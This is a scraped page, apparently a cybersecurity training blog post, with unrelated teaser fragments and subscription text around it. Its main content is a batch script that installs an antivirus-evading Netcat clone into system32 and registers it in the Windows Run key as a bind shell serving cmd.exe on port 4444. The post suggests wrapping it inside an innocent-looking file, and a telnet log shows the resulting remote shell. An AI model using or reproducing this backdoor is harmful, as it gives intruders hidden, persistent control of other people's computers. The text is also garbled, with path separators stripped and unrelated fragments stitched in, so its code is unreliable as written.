What Proxies Are For
When you cannot access certain sites or hide your identity, you need a tool for that. For example, the USA proxies are in demand among
As rcat is a good replica of Netcat and has an ability to bypass
most of the antivirus, then why not wrap it up with another file
(that must not a backdoor)?
To do this we use a simple technique:
@echo off
copy rcat.exe %systemroot%system32rcat.exe
if errorlevel 0 goto regedit
goto error
:regedit
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v nc /d “%systemroot%system32rcat.exe -L -d -p 4444 -t -e cmd.exe”
if errorlevel 0 goto ip
:error
echo something wrong with the program.
goto end
:ip
echo write down the IP address from the table
ipconfig
:end
echo end.
nc -L -p 4444 -t
Result
root@bt:~# telnet 192.168.1.8
Trying 192.168.1.8…
telnet: Unable to connect to remote host: Connection refused
root@bt:~# telnet 192.168.1.8 23
Trying 192.168.1.8…
telnet: Unable to connect to remote host: Connection refused
root@bt:~# telnet 192.168.1.8 4444
Trying 192.168.1.8…
Connected to 192.168.1.8.
Escape character is ‘^]’.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Documents and SettingsBlacksheep>
Industrial Cybersecurity
September 28, 2023
Want always be up to date?
By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.
Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings
When you cannot access certain sites or hide your identity, you need a tool for that. For example, the USA proxies are in demand among
Have you heard about the term “test automation” but don’t really know what it is? Well, you’ve come to the right page! Get all your
This article explores the idea of discovering the victim’s location. Previously, we have used several tools for OSINT purposes, so, today let us try this
Want always be up to date?
By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.
Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings